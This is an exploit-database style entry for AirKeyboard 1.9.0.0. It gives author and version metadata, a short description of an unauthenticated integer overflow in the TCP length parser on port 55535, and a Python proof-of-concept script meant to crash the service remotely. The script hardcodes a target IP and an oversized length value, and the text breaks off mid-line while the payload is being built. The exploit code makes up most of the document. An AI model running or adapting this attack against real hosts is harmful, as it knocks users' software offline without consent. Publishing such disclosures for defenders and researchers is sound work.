# Exploit Title: AirKeyboard 1.9.0.0 Integer Overflow to Remote Denial of Service (DoS) # Date: 2025-06-14 # Exploit Author: Chokri Hammedi # Vendor Homepage: http://www.airkeyboardapp.com/ # Software Link: http://www.airkeyboardapp.com/download?os=Windows # Version: 1.9.0.0 # Tested on: Windows 10/11 #!/usr/bin/env python3 ''' AirKeyboard 1.9.0.0 suffers from an integer overflow vulnerability in its TCP request handler. The ReadLength method parses a 4-byte user-supplied length field without bounds checking, allowing attackers to trigger a denial-of-service by sending a malformed packet with an oversized length value. Exploitation requires no authentication and affects the default TCP port (55535). ''' import socket import struct target_ip = "192.168.8.105" target_port = 55535 overflow_length = 0xFFFFFFFFFFFFFFFF body = b"A" * 8 payload = struct.pack("